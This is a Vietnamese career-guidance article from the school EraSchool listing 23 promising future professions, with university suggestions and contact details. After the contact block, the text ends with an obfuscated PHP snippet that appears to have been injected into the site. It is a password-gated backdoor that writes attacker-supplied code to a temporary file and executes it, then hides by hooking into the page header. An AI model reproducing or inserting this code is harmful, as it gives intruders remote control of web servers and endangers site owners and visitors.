Top 23 ngành nghề hot nhất tại Việt Nam trong tương lai các phụ huynh và học sinh cần biết

3.7/5 - (17 bình chọn)

Mới đây, Cục Thống kê Lao động Hoa Kỳ đã công bố dự báo (được thực hiện hai năm một lần) về sự phát triển của hàng trăm nghề nghiệp từ năm 2016 đến 2026.

Dựa trên những nghiên cứu dự báo và đánh giá về thu nhập trung bình hàng năm của những công việc này, Eraschool gửi đến các Quý phụ huynh và học sinh Top 23 ngành nghề hot nhất tại Việt Nam trong tương lai trong bài viết sau!

Bác sĩ

Có thể nói rằng đây là ngành nghề mơ ước của rất nhiều phụ huynh và cả các em học sinh. Đây là ngành nghề có thu nhập cao vào ổn định. Mặc dù vậy để trở thành một bác sĩ tương lai các em cần phải yêu nghề, bên cạnh đó quan trọng nhất là sự cẩn thận, tỉ mỉ tận tâm với nghề nghiệp là yếu tố quyết định thành công trong tương lai.

Bác sĩ luôn là một ngành Hot mà giới trẻ không thể bỏ qua. Các em có thể lựa chọn các trường đại học để học và trở thành bác sĩ tương lai như:

Trường Đại học Y Hà Nội

Trường Đại học Y dược thành phố Hồ Chí Minh

Đại học Dược Hà Nội

Học viện Quân y

Đại học Y dược Thái Bình

Đại học Y dược Cần Thơ

Nghe Bac Sy Top 23 Nganh Nghe Hot Nhat Tai Viet Nam Trong Tuong Lai

Chăm sóc sắc đẹp

Khi xã hội và mức sống ngày càng phát triển thì nhu cầu chăm sóc sắc đẹp của mỗi người sẽ ngày càng tăng lên. Đối với các ngành chăm sóc sắc đẹp như spa, thẩm mỹ viện, các salon tạo mẫu tóc là một trong những ngành “hái ra tiền” trong tương lai.

Quân đội – Công an

Đây là những ngành nghề có triển vọng trong tương lai. Để được đứng trong hàng ngũ của quân đội – công an phục vụ đất nước. Em cần phải có sức khỏe, sự bền bỉ, kiên trì, chịu khó. Các trường đại học đào tạo về công an và quân đội lấy điểm khá cao. Chính vì vậy muốn trở thành “chiến sĩ” trong tương lai thì em phải có trí và lực.

Các trường top đào tạo Công an và Quân đội để trở thành các chiến sĩ tương lai

Học viện Kỹ thuật quân sự

Học viện Quân y

Học viện Hậu cần

Học viện phòng không không quân

Học viện Hải quân….

Sửa chữa điện thoại

Nếu em không có mong muốn hoặc không đủ điều kiện để học đại học. Thì đây là ngành mà em có thể theo học để có thu nhập cao. Nghề này cũng đòi hỏi sự kiên trì và cẩn thận và là nghề hot trong tương lai ở Việt Nam.

Kỹ sư phần mềm

Đây được coi là một trong các ngành hot trong tương lai. Đây còn là công việc sáng tạo khó khăn bậc nhất. Công việc yêu cần sự kiên trì và sáng tạo không ngừng. Nếu theo ngành học này em sẽ có nhiều đất dụng võ về ý tưởng và năng lực.

Em có thể theo học ở các trường đại học như: Đại học Bách khoa Hà Nội, Học viện kỹ thuật Quân sự, Đại học Công nghệ – Đại học Quốc gia Hà Nội, Học viện công nghệ bưu chính viễn thông….

Thiết kế đồ họa

Thiết kế đồ họa là ngành dễ xin việc trong tương lai. Với nhu cầu thiết kế cao trong các lĩnh vực khác nên thiết kế đồ họa đang là một trong những ngành “hot”. Ngoài việc được đào tạo trong các trường đại học về chuyên ngành đồ họa. Hiện nay có những khóa học ngắn hạn giúp em có thể học và theo đuổi đam mê đồ họa một cách dễ dàng hơn.

Các trường đạo tạo về thiết kế đồ họa:

Học viện Công nghệ Bưu chính viễn thông

Đại học Kiến trúc Hà Nội

Đại học FPT

Trường Đại học Khoa học Tự nhiên

Thiet Ke Do Hoa Top 25 Nganh Nghe Hot Nhat Trong Tuong Lai

Quản lý nhà hàng, khách sạn

Nhóm ngành này đòi hỏi nhiều yếu tố về sự khéo léo. Khi xã hội ngày càng phát triển sẽ kéo theo các nhu cầu về hưởng thụ cuộc sống. Chính vì vậy đây là nhóm ngành mà sẽ không bao giờ bị “thất nghiệp” và vô cùng triển vọng trong tương lai.

Em có thể theo học ở các trường như:

Cao đẳng Du lịch Hà Nội

Bộ môn Du Lịch -Trường Đại học Khoa học Xã hội và Nhân văn -TP.HCM

Khoa Du Lịch – Đại Học Huế

Khoa Khách sạn- Du lịch Trường Đại học Thương mại
Khoa Du Lịch và Khách Sạn- Trường Đại học Kinh tế Quốc dân

Ngành điện – cơ khí

Đây là nhóm ngành hiện đang cần nhiều nhân lực, ngành đòi hỏi kinh nghiệm khá cao. Khi “đầu tư” vào ngành này em phải có sức khỏe, kiên trì và có phần mạo hiểm. Chính vì vậy ngành này thường chỉ có nam giới lựa chọn. Tuy nhiên đây là nghề mang lại thu nhập cao và ổn định. Và chắc chắn là những ngành nghề kinh doanh phát triển trong tương lai.

Marketing Online

Với sự phát triển bùng nổ của công nghệ thông tin và các mạng xã hội như Facebook, Google. Nhu cầu tiếp thị sản phẩm ngày càng tăng nhanh. Chính vì vậy các công ty về Marketing ngày càng phát triển nhiều. Đây là cơ hội để khởi nghiệp ngành này.

Em có thể theo học ở các trường như:

Trường Đại học tài chính – Marketing
Trường Đại học Kinh tế quốc dân
Trường Đại học Thương mại Hà Nội
Học viện Công nghệ Bưu chính viễn thông

Kiến trúc sư

Là một trong những những ngành hot nhất trong tương lai với thu nhập ổn định và cơ phát triển, nghề Kiến trúc sư đòi hỏi sự sáng tạo cao và yêu cầu sử dụng tốt các công cụ kèm theo để làm việc như các phần mềm, công cụ thiết kế… Các trường đào tạo về kiến trúc sư như: Đại học Kiến trúc Hà Nội. Đại học Kiến trúc Hồ Chí Minh. Đại học Bách khoa Hà Nội, Đại học Bách khoa Đà Nẵng….

Ngoại ngữ

Ngoại ngữ có tiềm năng trở thành ngành hot nhất trong tương lai dễ “hái ra tiền”. Nếu được đào tạo về chuyên ngành về ngoại ngữ em sẽ có cơ hội nghề nghiệp vô cùng rộng mở. Nếu giỏi ngoại ngữ thu nhập của em sẽ cao hơn nhiều. Có thể lựa chọn làm giáo viên, phiên dịch viên, nhân viên ngoại giao, đối ngoại….

Hiện có rất nhiều các trường đào tạo về ngoại ngữ như: Đại học Ngoại ngữ. Đại học Hà Nội. Đại học Ngoại thương. Khoa Quốc tế Đại học Quốc gia Hà Nội. Viện đại học Mở….

Bien Tap Vien Top 25 Nganh Nghe Hot Nhat Trong Tuong Lai

Có ngoại ngữ, tương lai luôn rộng mở với nhiều ngành nghề khác nhau

Tiếp viên hàng không

Đây là ngành nghề yêu thích của “trai xinh, gái đẹp”. Với mong muốn được khám phá khắp nơi trên thế giới. Được thể hiện mình và đặc biệt là thu nhập cao thì đây là lựa chọn của nhiều bạn trẻ. Nhưng có thể nói đây là nghề khá áp lực và tốn nhiều thời gian.

Xây dựng

Ngành xây dựng là một trong các ngành hot nhất trong tương lai. Hiện nay đang có nhiều yếu tố thuận lợi như chính sách vay vốn ngân hàng thuận lợi. Các tổ chức, cá nhân có thể dễ dàng vay vốn để kinh doanh. Chính vì vậy nghề xây dựng đang có nhiều cơ hội để mở rộng và phát triển.

Ở Việt Nam có các trường đào tại về xây dựng như: Đại học Xây dựng, Đại học Mỏ địa chất, Đại học Giao thông Vận tải….

Kinh doanh

Kinh doanh luôn là ngành nghề hot và không bao giờ hạ nhiệt. Đây là nghề không giới hạn tuổi tác, bằng cấp. Chỉ cần có đam mê và đầu óc kinh doanh là có thể thành công.

Bất động sản

Bất động sản là một ngành thuộc lĩnh vực kinh doanh và tiếp thị. Nếu đam mê lĩnh vực này thì em phải là người kiên trì, chịu khó và sáng tạo. Thu nhập của chuyên viên bất động sản không giới hạn tùy thuộc vào năng lực của bản thân. Nếu muốn thử thách bản thân thì đây chính là nghề phù hợp để chọn lựa.

Du lịch

Cũng giống như tiếp viên hàng không. Ngành du lịch đòi hỏi sức khỏe, đam mê và nhiệt huyết trong việc. Để được “đi đâu đi đó” thì nghề này chính là sự lựa chọn hoàn hảo.

Công nghệ thông tin

Thời đại 4.0 thì công nghệ thông tin chắc chắn là một trong những những ngành hot nhất trong tương lai. Những năm gần đây công nghệ thông tin được phát triển với tốc độ chóng mặt. Lựa chọn ngành nghề này em sẽ có hội nghề nghiệp vô cùng rộng mở.

Các trường Đại học chuyên về đào tạo công nghệ thông tin như: Học viện Công nghệ Bưu chính viễn thông. Đại học Kiến trúc Hà Nội. Đại học FPT, Trường Đại học Khoa học Tự nhiên. Đại học Bách khoa Hà Nội…

Công nghệ sinh học

Hiện nay có nhiều viện, trung tâm nghiên cứu, cơ sở đào tạo. Và hàng loạt cơ sở triển khai ứng dụng công nghệ sinh học đã được hình thành. Tuy nhiên, nguồn nhân lực trình độ cao trong lĩnh vực này hiện đang thiếu nên triển vọng nghề nghiệp dành cho người theo học Công nghệ sinh học là rất lớn.

Đây chính là cơ hội cho các cử nhân ngành Công nghệ sinh học có thể lựa chọn việc làm với mức lương hấp dẫn.

Giáo viên

Có thể nó rằng giáo viên chắc chắn sẽ trở thành những ngành hot nhất trong tương lai. Trước đây nếu muốn làm giáo viên em cần phải xin vào làm việc ở các trường học. Tuy nhiên hiện nay cơ hội nghề nghiệp cho nghề này vô cùng rộng mở. Em có thể dạy học ở các trung tâm, các công ty về giáo dục, viết sách, công ty về sách giáo dục… Cơ hội nghề nghiệp của giáo viên ngày càng rộng mở và chế độ đãi ngộ cũng ngày càng cao.

Quản lý nhân sự

Bộ phận Nhân sự của công ty luôn cần một người lãnh đạo để quản lý xung đột giữa các cá nhân với sự trợ giúp của các kỹ năng mang tính nhận thức và lý luận. Lĩnh vực này được dự đoán sẽ tăng 9% vào năm 2024 khi các công ty phát triển và cần các cấu trúc mạnh mẽ hơn để hỗ trợ và giúp đỡ nhân viên.

Quản lý quan hệ công chúng

Các nhà quản lý PR thành công dựa vào một mạng lưới các mối quan hệ và liên hệ để mua các vị trí báo chí và quảng cáo cho các công ty mà họ đại diện, làm cho vai trò này hoàn toàn an toàn. Các nhà quản lý PR, những người phải nâng cao nhận thức về một vấn đề hoặc nhiệm vụ cần sự tiếp xúc đặc biệt của con người để gây sự chú ý hoặc khiến mọi người tham gia vào một chiến dịch – và công việc dự kiến ​​sẽ tăng 7% vào năm 2024.

Tổ chức sự kiện

Lập kế hoạch sự kiện là một lĩnh vực đang phát triển. Cho dù bạn đang lên kế hoạch cho một sự kiện cho nhân viên, khách hàng hoặc một sự kiện trong ngành với hàng chục ngàn người tham dự thì quy trình lập kế hoạch luôn gồm nhiều công đoạn, nhiều bộ phận có liên quan. Các nhà hoạch định phải phối hợp và đàm phán với các nhà cung cấp, nhà thầu để kết nối các kỹ năng tổ chức và con người có liên quan với nhau. Điều này biến hoạch định sự kiện thành một vai trò gần như không thể tự động hóa.

To Chuc Su Kien Top 25 Nganh Nghe Hot Nhat Trong Tuong Lai

Quản lí tài chính

Quản lí tài chính là một nghề bí ẩn và nhiều màu sắc. Theo qui định của “chuyên gia chứng khoán”, nhà quản lí tài chính phải được giáo dục chuyên nghiệp và nghiên cứu theo chiều sâu, có phẩm chất đạo đức cao, có ít nhất 3 năm kinh nghiệm làm việc trong ngành. Sự quản lí tài chính trong công ty có ý nghĩa vô cùng quan trọng. Hiện nay, ở nước ta phần lớn các quỹ tài chính đều do lãnh đạo ban đầu tư chịu trách nhiệm quản lí. Các doanh nghiệp sẽ có những đặc điểm quản lí riêng và quyền hạn của nhà quản lí tài chính cũng rất hạn chế.

Nhà văn

Các nhà văn phải sáng tạo và sản xuất tài liệu gốc bằng văn bản. Công nghệ trí tuệ nhân tạo – AI có thể thực hiện một số điều này với các đề xuất tiêu đề, viết lời nhắc và tin nhắn truyền thông xã hội tự động, nhưng bài đăng trên blog, sách, phim và vở kịch chỉ có thể được viết bởi con người. Bởi ngoài tính lý trí của bài viết, tác phẩm thì cảm xúc mới đem lại sự lý thú cho sản phẩm đó.

Trên đây là những ngành nghề hot nhất tại Việt Nam trong tương lai được chọn lọc bởi các giáo viên và chuyên gia của EraSchool – Hệ thống trường Liên cấp Sinh Thái theo mô hình giáo dục STEAM (chuẩn Hoa Kỳ) đầu tiên tại Việt Nam, bài viết phục vụ cho mục đích hướng nghiệp cho các phụ huynh và học sinh thân yêu. Erachool cảm ơn sự theo dõi và đón đọc các bài tiếp theo!

 

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}